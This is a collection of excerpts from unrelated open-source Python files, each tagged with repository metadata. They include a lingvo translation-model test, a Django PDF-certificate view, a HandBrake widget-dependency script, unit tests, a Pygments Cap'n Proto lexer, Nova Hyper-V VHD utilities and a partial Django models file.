canvas_gold = np.asarray([[13, 15, 2, 0, 0], [10, 11, 14, 2, 0],
[2, 0, 0, 0, 0], [10, 11, 13, 14, 2]], np.int32)
canvas_paddings_gold = np.asarray(
[[0., 0., 0., 1., 1.], [0., 0., 0., 0., 1.], [0., 1., 1., 1., 1.],
[0., 0., 0., 0., 0.]], np.float32)
target_indices_gold = np.asarray(
[[0, 0, 10], [0, 0, 11], [0, 0, 12], [0, 0, 2], [0, 1, 14], [0, 1, 2],
[0, 2, 2], [1, 0, 2], [1, 1, 2], [1, 2, 12], [1, 2, 13], [1, 2, 2],
[1, 3, 15], [1, 3, 2], [2, 0, 2], [3, 0, 2], [3, 1, 2], [3, 2, 12],
[3, 2, 2], [3, 3, 2], [3, 4, 2]], np.int32)
target_weights_gold = np.asarray([1, 1, 1, 0, 1, 0, 1] +
[1, 1, 1, 1, 0, 1, 0] + [1] +
[1, 1, 1, 0, 1, 1], np.float32)
target_weights_gold = np.reshape(target_weights_gold,
[target_weights_gold.shape[0], 1])
self.assertAllEqual(canvas, canvas_gold)
self.assertAllEqual(canvas_paddings, canvas_paddings_gold)
self.assertAllEqual(target_indices, target_indices_gold)
self.assertAllEqual(target_weights, target_weights_gold)
def testCreateCanvasAndTargets(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
batch = py_utils.NestedMap(
src=py_utils.NestedMap(
ids=tf.convert_to_tensor(
np.asarray([
[10, 11, 12, 14, 2, 0],
[20, 21, 22, 24, 25, 2],
], np.int32)),
paddings=tf.convert_to_tensor(
np.asarray([[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]],
np.float32))),
tgt=py_utils.NestedMap(
ids=tf.convert_to_tensor(
np.asarray([[100, 101, 102, 104, 2, 0],
[200, 201, 202, 204, 205, 2]], np.int32)),
paddings=tf.convert_to_tensor(
np.asarray([[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]],
np.float32))))
p = self._testParams()
mdl = p.Instantiate()
descriptor = mdl._CreateCanvasAndTargets(batch)
canvas, canvas_paddings, target_indices, target_weights = self.evaluate([
descriptor.canvas, descriptor.canvas_paddings,
descriptor.target_indices, descriptor.target_weights
])
canvas_gold = np.asarray([
[32014, 32002, 104, 2, 0, 0, 0, 0],
[32020, 32021, 32022, 32002, 200, 201, 202, 2],
], np.int32)
canvas_paddings_gold = np.asarray(
[[0., 0., 0., 0., 1., 1., 1., 1.], [0., 0., 0., 0., 0., 0., 0., 0.]],
np.float32)
target_indices_gold = np.asarray(
[[0, 0, 10], [0, 0, 11], [0, 0, 12], [0, 0, 2], [0, 1, 2], [1, 0, 2],
[1, 1, 2], [1, 2, 2], [1, 3, 24], [1, 3, 25], [1, 3, 2], [0, 2, 100],
[0, 2, 101], [0, 2, 102], [0, 2, 2], [0, 3, 2], [1, 4, 2], [1, 5, 2],
[1, 6, 2], [1, 7, 204], [1, 7, 205], [1, 7, 2]], np.int32)
target_weights_gold = np.asarray([1, 1, 1, 0, 1] + [1, 1, 1, 1, 1, 0] +
[1, 1, 1, 0, 1] + [1, 1, 1, 1, 1, 0],
np.float32)
target_weights_gold = np.reshape(target_weights_gold,
[target_weights_gold.shape[0], 1])
self.assertAllEqual(canvas, canvas_gold)
self.assertAllEqual(canvas_paddings, canvas_paddings_gold)
self.assertAllEqual(target_indices, target_indices_gold)
self.assertAllEqual(target_weights, target_weights_gold)
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
self.assertEqual(len(flatten_vars), 122)
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFPropGraph(self):
"""Test the construction of the fprop graph, then fprop the graph."""
with self.session():
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
self.evaluate(tf.global_variables_initializer())
self.evaluate(mdl.loss)
class TransformerXEnDecTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtDoubleInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_doublebatch_test-000-001')
p.file_pattern = 'tfrecord:' + input_file
p.tokenizer.token_vocab_filepath = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [10, 20]
p.bucket_batch_limit = [4, 2]
p.source_mask_ratio = -1
p.source_mask_ratio_beta = '2,6'
p.mask_word_id = 31999
p.pad_id = 31998
p.mask_words_ratio = 0.25
p.permutation_distance = 3
p.vocab_file = p.tokenizer.token_vocab_filepath
p.packed_input = False
return p
def _EncoderParams(self):
p = encoder.TransformerXEncoder.Params()
p.name = 'mix_encoder'
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim()
p.token_emb.vocab_size = 32000
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.scale_sqrt_depth = True
p.token_emb.vn = py_utils.VariationalNoiseParams(1.0, False, False)
p.position_emb.embedding_dim = 4
p.position_emb.trainable_scaling = False
p.model_dim = 4
ts = p.transformer_stack
ts.model_dim = 4
ts.num_transformer_layers = 6
ts.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
ts.transformer_tpl.tr_fflayer_tpl.hidden_dim = 4
p.random_seed = 54321
return p
def _DecoderParams(self):
p = decoder.TransformerXDecoder.Params()
p.name = 'mix_decoder'
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim()
p.token_emb.vocab_size = 32000
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.scale_sqrt_depth = True
p.token_emb.vn = py_utils.VariationalNoiseParams(1.0, False, False)
p.position_emb.embedding_dim = 4
p.position_emb.trainable_scaling = False
p.model_dim = 4
p.source_dim = 4
p.num_trans_layers = 6
p.trans_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_atten_tpl.atten_hidden_dim = 4
p.trans_tpl.tr_atten_tpl.atten_tpl.context_dim = p.model_dim
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 4
p.trans_tpl.tr_fflayer_tpl.input_dim = p.model_dim
p.label_smoothing = layers.UniformLabelSmoother.Params()
p.label_smoothing.uncertainty = 0.1
p.per_word_avg_loss = True
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
p.random_seed = 54321
return p
def _testParams(self):
p = model.TransformerXEnDecModel.Params()
p.name = 'xendec'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.random_seed = 12345
return p
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session(use_gpu=False):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
dec_metrics, _ = mdl.FPropDefaultTheta()
self.evaluate(tf.global_variables_initializer())
vals = []
print(mdl)
for _ in range(5):
vals += [
self.evaluate(
(dec_metrics['clean_loss'][0], dec_metrics['other_loss'][0],
dec_metrics['mix_loss'][0], dec_metrics['loss'][0]))
]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(
vals, [[10.373864, 10.371083, 10.372491, 31.11744],
[10.36428, 10.379262, 10.366394, 31.109936],
[10.369206, 10.372709, 10.369126, 31.111042],
[10.363656, 10.364362, 10.362683, 31.090702],
[10.371622, 10.374066, 10.371591, 31.11728]],
rtol=1e-02,
atol=1e-02)
if __name__ == '__main__':
tf.test.main()
| tensorflow/lingvo | lingvo/tasks/mt/model_test.py | Python | apache-2.0 | 35,425 | 0.011066 |
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.views.generic import View
from django.http import HttpResponse
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from reportlab.platypus import (Flowable, Paragraph,
SimpleDocTemplate, Spacer)
from .models import TablaSolicitud
from .models import Bitacora
from .models import TablaAlumno
# Create your views here.
class ConsultarDocumento(View):
template_name = "consultarDocumento.html"
def get(self, request):
return render(
request,
self.template_name,
)
class VerDocumento(View):
template_name = "verDocumento.html"
model = TablaAlumno
model2 = TablaSolicitud
def get(self, request, folio):
self.request.session['errorConsulta'] = None
print(folio)
context = dict()
try:
alumn=self.model.objects.get(codigo = folio)
except:
self.request.session['errorConsulta'] = "Es incorrecto el código insertado"
return redirect('consultar')
context['solicitudes'] = self.model2.objects.filter(alumno_id=alumn.id)
return render(
request,
self.template_name,
context
)
class VerPdf(View):
template_name = "verPdf.html"
model = TablaSolicitud
model2 = TablaAlumno
def get(self, request, id, solicitudId):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="Documento.pdf"'
p = canvas.Canvas(response)
alumno = self.model2.objects.get(codigo=id)
bitacora = self.model.objects.get(id = solicitudId)
# x,y
p.setFont("Helvetica", 16)
p.drawCentredString(260,800,"INSTITUTO POLITECNICO NACIONAL")
p.drawCentredString(260,770,"ESCUELA SUPERIOR DE COMPUTO")
p.drawCentredString(280,740,"SUBDIRECCION DE SERVIVIOS EDUCATIVOS E INTEGRACION SOCIAL")
p.line(120,700,580,700)
p.setFont("Helvetica", 12)
p.drawCentredString(260,715,"DEPARTAMENTO DE GESTION ESCOLAR")
p.drawCentredString(260,700,str(bitacora.documento))
p.drawCentredString(100,695,"A QUIEN CORRESPONDA:")
p.drawCentredString(100,670,"HACE CONSTAR QUE EL ALUMNO")
p.drawCentredString(260,650,str(bitacora.alumno))
p.drawCentredString(100,630,"CON NUMERO DE BOLETA")
p.drawCentredString(230,630,str(bitacora.alumno.boleta))
p.drawCentredString(380,630,"ESTA INSCRITO EN ESTE PLANTEL");
p.drawCentredString(200, 600, str(bitacora.fecha))
p.drawCentredString(200, 610, str(bitacora.estado))
p.drawCentredString(200, 620, str(bitacora.folio))
p.showPage()
p.save()
return response
| CallmeTorre/Idalia | ESCOM/ConsultarDocumento/views.py | Python | apache-2.0 | 2,955 | 0.012864 |
#! /usr/bin/python
import collections
import sys
import json
DepEntry = collections.namedtuple('DepEntry', 'widget dep enable die hide')
dep_map = (
DepEntry("title", "queue_add", "none", True, False),
DepEntry("title", "queue_add_menu", "none", True, False),
DepEntry("title", "queue_add_multiple_menu", "none", True, False),
DepEntry("title", "preview_frame", "none", True, False),
DepEntry("title", "picture_summary", "none", True, False),
DepEntry("title", "picture_summary2", "none", True, False),
DepEntry("title", "chapters_tab", "none", True, False),
DepEntry("title", "start_point", "none", True, False),
DepEntry("title", "end_point", "none", True, False),
DepEntry("title", "angle", "none", True, False),
DepEntry("title", "angle_label", "1", True, False),
DepEntry("use_dvdnav", "angle", "0", True, True),
DepEntry("use_dvdnav", "angle_label", "0", True, True),
DepEntry("angle_count", "angle", "1", True, True),
DepEntry("angle_count", "angle_label", "1", True, True),
DepEntry("vquality_type_bitrate", "VideoAvgBitrate", "1", False, False),
DepEntry("vquality_type_constant", "VideoQualitySlider", "1", False, False),
DepEntry("vquality_type_constant", "VideoTwoPass", "1", True, False),
DepEntry("vquality_type_constant", "VideoTurboTwoPass", "1", True, False),
DepEntry("VideoFramerate", "VideoFrameratePFR", "source", True, True),
DepEntry("VideoFramerate", "VideoFramerateVFR", "source", False, True),
DepEntry("VideoTwoPass", "VideoTurboTwoPass", "1", False, False),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlace", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceCustom", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceLabel", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecomb", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombCustom", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombLabel", "0", True, True),
DepEntry("PictureDeinterlace", "PictureDeinterlaceCustom", "custom", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePreset", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePresetLabel", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTune", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTuneLabel", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseCustom", "off", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseCustom", "custom", False, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTune", "custom", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTuneLabel", "custom", True, True),
DepEntry("PictureDecomb", "PictureDecombCustom", "custom", False, True),
DepEntry("PictureDetelecine", "PictureDetelecineCustom", "custom", False, True),
DepEntry("PictureWidthEnable", "PictureWidth", "1", False, False),
DepEntry("PictureHeightEnable", "PictureHeight", "1", False, False),
DepEntry("PictureAutoCrop", "PictureTopCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureBottomCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureLeftCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureRightCrop", "0", False, False),
DepEntry("x264_bframes", "x264_bpyramid", "<2", True, False),
DepEntry("x264_bframes", "x264_direct", "0", True, False),
DepEntry("x264_bframes", "x264_b_adapt", "0", True, False),
DepEntry("x264_subme", "x264_psy_rd", "<6", True, False),
DepEntry("x264_subme", "x264_psy_trell", "<6", True, False),
DepEntry("x264_trellis", "x264_psy_trell", "0", True, False),
DepEntry("VideoEncoder", "x264FastDecode", "x264", False, True),
DepEntry("VideoEncoder", "x264UseAdvancedOptions", "x264", False, True),
DepEntry("HideAdvancedVideoSettings", "x264UseAdvancedOptions", "1", True, True),
DepEntry("VideoEncoder", "VideoOptionExtraWindow", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("VideoEncoder", "VideoOptionExtraLabel", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("x264UseAdvancedOptions", "VideoSettingsTable", "1", True, False),
DepEntry("VideoEncoder", "x264_box", "x264", False, True),
DepEntry("x264UseAdvancedOptions", "x264_box", "0", True, False),
DepEntry("auto_name", "autoname_box", "1", False, False),
)
def main():
try:
depsfile = open("widget.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err) )
sys.exit(1)
try:
revfile = open("widget_reverse.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err))
sys.exit(1)
top = dict()
for ii in dep_map:
if ii.widget in top:
continue
deps = list()
for jj in dep_map:
if jj.widget == ii.widget:
deps.append(jj.dep)
top[ii.widget] = deps
json.dump(top, depsfile, indent=4)
top = dict()
for ii in dep_map:
if ii.dep in top:
continue
deps = list()
for jj in dep_map:
if ii.dep == jj.dep:
rec = list()
rec.append(jj.widget)
rec.append(jj.enable)
rec.append(jj.die)
rec.append(jj.hide)
deps.append(rec)
top[ii.dep] = deps
json.dump(top, revfile, indent=4)
main()
| utensil-star/HandBrake | gtk/src/makedeps.py | Python | gpl-2.0 | 5,589 | 0.004831 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import random
import unittest
from measurement_stats import angle
from measurement_stats import value
from measurement_stats import value2D
HALF_SQRT_2 = 0.5 * math.sqrt(2.0)
HALF_SQRT_3 = 0.5 * math.sqrt(3.0)
class TestValue2D(unittest.TestCase):
def test_angleBetween(self):
p1 = value2D.Point2D(
value.ValueUncertainty(2.0, 0.1),
value.ValueUncertainty(0.0, 0.1) )
p2 = value2D.Point2D(
value.ValueUncertainty(0.0, 0.1),
value.ValueUncertainty(2.0, 0.1) )
a = p1.angle_between(p2)
self.assertAlmostEquals(a.degrees, 90.0, 1)
def test_rotate(self):
tests = [
(90.0, 0.0, 1.0), (-90.0, 0.0, -1.0),
(180.0, -1.0, 0.0), (-180.0, -1.0, 0.0),
(270.0, 0.0, -1.0), (-270.0, 0.0, 1.0),
(360.0, 1.0, 0.0), (-360.0, 1.0, 0.0),
(45.0, HALF_SQRT_2, HALF_SQRT_2),
(-45.0, HALF_SQRT_2, -HALF_SQRT_2),
(315.0, HALF_SQRT_2, -HALF_SQRT_2),
(-315.0, HALF_SQRT_2, HALF_SQRT_2),
(30.0, HALF_SQRT_3, 0.5), (-30.0, HALF_SQRT_3, -0.5),
(330.0, HALF_SQRT_3, -0.5), (-330.0, HALF_SQRT_3, 0.5) ]
for test in tests:
radius = random.uniform(0.001, 1000.0)
p = value2D.Point2D(
value.ValueUncertainty(radius, 0.25),
value.ValueUncertainty(0.0, 0.25) )
p.rotate(angle.Angle(degrees=test[0]))
self.assertAlmostEqual(p.x.raw, radius * test[1], 2)
self.assertAlmostEqual(p.y.raw, radius * test[2], 2)
def test_projection(self):
"""
:return:
"""
line_start = value2D.create_point(0, 0)
line_end = value2D.create_point(1, 1)
point = value2D.create_point(0, 1)
result = value2D.closest_point_on_line(point, line_start, line_end)
self.assertIsNotNone(result)
print('PROJECTION:', result)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestValue2D)
unittest.TextTestRunner(verbosity=2).run(suite)
| sernst/RefinedStatistics | measurement_stats/test/test_value2D.py | Python | mit | 2,275 | 0.002198 |
# -*- coding: utf-8 -*-
"""
pygments.lexers.capnproto
~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Cap'n Proto schema language.
:copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default
from pygments.token import Text, Comment, Keyword, Name, Literal
__all__ = ['CapnProtoLexer']
class CapnProtoLexer(RegexLexer):
"""
For `Cap'n Proto <https://capnproto.org>`_ source.
.. versionadded:: 2.2
"""
name = 'Cap\'n Proto'
filenames = ['*.capnp']
aliases = ['capnp']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'#.*?$', Comment.Single),
(r'@[0-9a-zA-Z]*', Name.Decorator),
(r'=', Literal, 'expression'),
(r':', Name.Class, 'type'),
(r'\$', Name.Attribute, 'annotation'),
(r'(struct|enum|interface|union|import|using|const|annotation|'
r'extends|in|of|on|as|with|from|fixed)\b',
Keyword),
(r'[\w.]+', Name),
(r'[^#@=:$\w]+', Text),
],
'type': [
(r'[^][=;,(){}$]+', Name.Class),
(r'[\[(]', Name.Class, 'parentype'),
default('#pop'),
],
'parentype': [
(r'[^][;()]+', Name.Class),
(r'[\[(]', Name.Class, '#push'),
(r'[])]', Name.Class, '#pop'),
default('#pop'),
],
'expression': [
(r'[^][;,(){}$]+', Literal),
(r'[\[(]', Literal, 'parenexp'),
default('#pop'),
],
'parenexp': [
(r'[^][;()]+', Literal),
(r'[\[(]', Literal, '#push'),
(r'[])]', Literal, '#pop'),
default('#pop'),
],
'annotation': [
(r'[^][;,(){}=:]+', Name.Attribute),
(r'[\[(]', Name.Attribute, 'annexp'),
default('#pop'),
],
'annexp': [
(r'[^][;()]+', Name.Attribute),
(r'[\[(]', Name.Attribute, '#push'),
(r'[])]', Name.Attribute, '#pop'),
default('#pop'),
],
}
| wakatime/wakatime | wakatime/packages/py27/pygments/lexers/capnproto.py | Python | bsd-3-clause | 2,194 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VHD related operations.
Official VHD format specs can be retrieved at:
http://technet.microsoft.com/en-us/library/bb676673.aspx
See "Download the Specifications Without Registering"
Official VHDX format specs can be retrieved at:
http://www.microsoft.com/en-us/download/details.aspx?id=34750
"""
import struct
import sys
if sys.platform == 'win32':
import wmi
from nova.openstack.common.gettextutils import _
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
from xml.etree import ElementTree
VHD_HEADER_SIZE_FIX = 512
VHD_BAT_ENTRY_SIZE = 4
VHD_DYNAMIC_DISK_HEADER_SIZE = 1024
VHD_HEADER_SIZE_DYNAMIC = 512
VHD_FOOTER_SIZE_DYNAMIC = 512
VHD_BLK_SIZE_OFFSET = 544
VHD_SIGNATURE = 'conectix'
VHDX_SIGNATURE = 'vhdxfile'
class VHDUtils(object):
def __init__(self):
self._vmutils = vmutils.VMUtils()
if sys.platform == 'win32':
self._conn = wmi.WMI(moniker='//./root/virtualization')
def validate_vhd(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ValidateVirtualHardDisk(
Path=vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def create_dynamic_vhd(self, path, max_internal_size, format):
if format != constants.DISK_FORMAT_VHD:
raise vmutils.HyperVException(_("Unsupported disk format: %s") %
format)
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDynamicVirtualHardDisk(
Path=path, MaxInternalSize=max_internal_size)
self._vmutils.check_ret_val(ret_val, job_path)
def create_differencing_vhd(self, path, parent_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDifferencingVirtualHardDisk(
Path=path, ParentPath=parent_path)
self._vmutils.check_ret_val(ret_val, job_path)
def reconnect_parent_vhd(self, child_vhd_path, parent_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ReconnectParentVirtualHardDisk(
ChildPath=child_vhd_path,
ParentPath=parent_vhd_path,
Force=True)
self._vmutils.check_ret_val(ret_val, job_path)
def merge_vhd(self, src_vhd_path, dest_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.MergeVirtualHardDisk(
SourcePath=src_vhd_path,
DestinationPath=dest_vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def resize_vhd(self, vhd_path, new_max_size, is_file_max_size=True):
if is_file_max_size:
new_internal_max_size = self.get_internal_vhd_size_by_file_size(
vhd_path, new_max_size)
else:
new_internal_max_size = new_max_size
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ExpandVirtualHardDisk(
Path=vhd_path, MaxInternalSize=new_internal_max_size)
self._vmutils.check_ret_val(ret_val, job_path)
def get_internal_vhd_size_by_file_size(self, vhd_path, new_vhd_file_size):
"""Fixed VHD size = Data Block size + 512 bytes
Dynamic_VHD_size = Dynamic Disk Header
+ Copy of hard disk footer
+ Hard Disk Footer
+ Data Block
+ BAT
Dynamic Disk header fields
Copy of hard disk footer (512 bytes)
Dynamic Disk Header (1024 bytes)
BAT (Block Allocation table)
Data Block 1
Data Block 2
Data Block n
Hard Disk Footer (512 bytes)
Default block size is 2M
BAT entry size is 4byte
"""
base_vhd_info = self.get_vhd_info(vhd_path)
vhd_type = base_vhd_info['Type']
if vhd_type == constants.VHD_TYPE_FIXED:
vhd_header_size = VHD_HEADER_SIZE_FIX
return new_vhd_file_size - vhd_header_size
elif vhd_type == constants.VHD_TYPE_DYNAMIC:
bs = self._get_vhd_dynamic_blk_size(vhd_path)
bes = VHD_BAT_ENTRY_SIZE
ddhs = VHD_DYNAMIC_DISK_HEADER_SIZE
hs = VHD_HEADER_SIZE_DYNAMIC
fs = VHD_FOOTER_SIZE_DYNAMIC
max_internal_size = (new_vhd_file_size -
(hs + ddhs + fs)) * bs / (bes + bs)
return max_internal_size
else:
raise vmutils.HyperVException(_("The %(vhd_type)s type VHD "
"is not supported") %
{"vhd_type": vhd_type})
def _get_vhd_dynamic_blk_size(self, vhd_path):
blk_size_offset = VHD_BLK_SIZE_OFFSET
try:
with open(vhd_path, "rb") as f:
f.seek(blk_size_offset)
version = f.read(4)
except IOError:
raise vmutils.HyperVException(_("Unable to obtain block size from"
" VHD %(vhd_path)s") %
{"vhd_path": vhd_path})
return struct.unpack('>i', version)[0]
def get_vhd_parent_path(self, vhd_path):
return self.get_vhd_info(vhd_path).get("ParentPath")
def get_vhd_info(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(vhd_info,
job_path,
ret_val) = image_man_svc.GetVirtualHardDiskInfo(vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
vhd_info_dict = {}
et = ElementTree.fromstring(vhd_info)
for item in et.findall("PROPERTY"):
name = item.attrib["NAME"]
value_text = item.find("VALUE").text
if name == "ParentPath":
vhd_info_dict[name] = value_text
elif name in ["FileSize", "MaxInternalSize"]:
vhd_info_dict[name] = long(value_text)
elif name in ["InSavedState", "InUse"]:
vhd_info_dict[name] = bool(value_text)
elif name == "Type":
vhd_info_dict[name] = int(value_text)
return vhd_info_dict
def get_vhd_format(self, path):
with open(path, 'rb') as f:
# Read header
if f.read(8) == VHDX_SIGNATURE:
return constants.DISK_FORMAT_VHDX
# Read footer
f.seek(0, 2)
file_size = f.tell()
if file_size >= 512:
f.seek(-512, 2)
if f.read(8) == VHD_SIGNATURE:
return constants.DISK_FORMAT_VHD
raise vmutils.HyperVException(_('Unsupported virtual disk format'))
def get_best_supported_vhd_format(self):
return constants.DISK_FORMAT_VHD
| ntt-sic/nova | nova/virt/hyperv/vhdutils.py | Python | apache-2.0 | 7,795 | 0.000257 |
"""
Tests for the test server itself.
Not intended to be run by the greater test suite, only by specifically
targeting it on the command-line. Rationale: not really testing Fabric itself,
no need to pollute Fab's own test suite. (Yes, if these tests fail, it's likely
that the Fabric tests using the test server may also have issues, but still.)
"""
__test__ = False
from nose.tools import eq_, ok_
from fabric.network import ssh
from server import FakeSFTPServer
class AttrHolder(object):
pass
def test_list_folder():
for desc, file_map, arg, expected in (
(
"Single file",
{'file.txt': 'contents'},
'',
['file.txt']
),
(
"Single absolute file",
{'/file.txt': 'contents'},
'/',
['file.txt']
),
(
"Multiple files",
{'file1.txt': 'contents', 'file2.txt': 'contents2'},
'',
['file1.txt', 'file2.txt']
),
(
"Single empty folder",
{'folder': None},
'',
['folder']
),
(
"Empty subfolders",
{'folder': None, 'folder/subfolder': None},
'',
['folder']
),
(
"Non-empty sub-subfolder",
{'folder/subfolder/subfolder2/file.txt': 'contents'},
"folder/subfolder/subfolder2",
['file.txt']
),
(
"Mixed files, folders empty and non-empty, in homedir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'empty_folder': None
},
'',
['file.txt', 'file2.txt', 'folder', 'empty_folder']
),
(
"Mixed files, folders empty and non-empty, in subdir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'folder/subfolder/file4.txt': 'contents4',
'empty_folder': None
},
"folder",
['file3.txt', 'subfolder']
),
):
# Pass in fake server obj. (Can't easily clean up API to be more
# testable since it's all implementing 'ssh' interface stuff.)
server = AttrHolder()
server.files = file_map
interface = FakeSFTPServer(server)
results = interface.list_folder(arg)
# In this particular suite of tests, all results should be a file list,
# not "no files found"
ok_(results != ssh.SFTP_NO_SUCH_FILE)
# Grab filename from SFTPAttribute objects in result
output = map(lambda x: x.filename, results)
# Yield test generator
eq_.description = "list_folder: %s" % desc
yield eq_, set(expected), set(output)
del eq_.description
| jaraco/fabric | tests/test_server.py | Python | bsd-2-clause | 2,975 | 0 |
from datetime import datetime
import io
import os
import tempfile
import zipfile
from PIL import Image, ImageFont
from PIL.Image import LANCZOS
from PIL.ImageDraw import Draw
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.fields.jsonb import JSONField
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import File
from django.core.files.storage import FileSystemStorage
from django.core.serializers.json import DjangoJSONEncoder
from django.db import models
from django.db.models import Q, F
from django.db.models.deletion import PROTECT, CASCADE
from django.http.response import HttpResponse
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField as django_extensions_JSONField
from reportlab.lib.pagesizes import A4, landscape
from reportlab.pdfgen import canvas
from reportlab.platypus.doctemplate import SimpleDocTemplate
import qrcode
from cmj import globalrules
from cmj.core.models import AuditLog
from cmj.mixins import CmjChoices
from cmj.utils import get_settings_auth_user_model, YES_NO_CHOICES, \
restringe_tipos_de_arquivo_midias, TIPOS_IMG_PERMITIDOS, \
media_protected_storage
from sapl.materia.models import MateriaLegislativa
from sapl.parlamentares.models import Parlamentar
CLASSE_ESTRUTURAL = 0
CLASSE_DOCUMENTAL = 1
CLASSE_MISTA = 2
PERFIL_CLASSE = ((
CLASSE_ESTRUTURAL, _('Classe Estrutural')),
(
CLASSE_DOCUMENTAL, _('Classe de Conteúdo')),
(
CLASSE_MISTA, _('Classe Mista'))
)
DOC_TEMPLATES_CHOICE_FILES = {
1: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
2: {
'template_name': 'path/path_thumbnails.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
99: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
}
DOC_TEMPLATES_CHOICE = CmjChoices(
(1, 'noticia', _('Notícia Pública')),
(2, 'galeria', _('Galeria de Imagens')),
)
CLASSE_TEMPLATES_CHOICE_FILES = {
1: 'path/path_classe.html',
2: 'path/path_galeria.html',
3: 'path/path_parlamentares.html',
